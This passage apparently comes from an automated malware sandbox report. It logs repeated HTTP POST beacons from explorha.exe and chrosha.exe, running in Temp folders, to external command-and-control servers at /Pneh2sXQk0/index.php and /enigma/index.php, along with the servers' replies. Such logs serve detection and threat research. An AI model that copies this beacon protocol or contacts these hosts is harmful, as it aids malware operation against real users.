                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:48.723680973 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      834192.168.2.550682193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:48.823247910 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:49.071283102 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      835192.168.2.550683193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:49.089917898 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:49.338819981 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      836192.168.2.550684193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:49.327337027 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:49.580192089 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      837192.168.2.550685193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:49.591481924 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:49.844173908 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      838192.168.2.550686193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:49.937822104 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:50.176759958 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      839192.168.2.550687193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:50.209768057 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:50.458019018 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      840192.168.2.550688193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:50.429778099 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:50.681679964 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      841192.168.2.550689193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:50.705348969 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:50.953484058 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      842192.168.2.550690193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:51.043363094 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:51.291095018 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      843192.168.2.550692193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:51.336133003 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:51.583940983 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      844192.168.2.550693193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:51.543253899 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:51.797352076 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      845192.168.2.550694193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:51.942477942 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:52.185715914 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      846192.168.2.550695193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:52.164560080 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:52.412255049 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      847192.168.2.550696193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:52.437187910 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:52.689637899 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      848192.168.2.550697193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:52.661782026 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:52.908240080 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      849192.168.2.550698193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:53.043832064 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:53.289475918 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


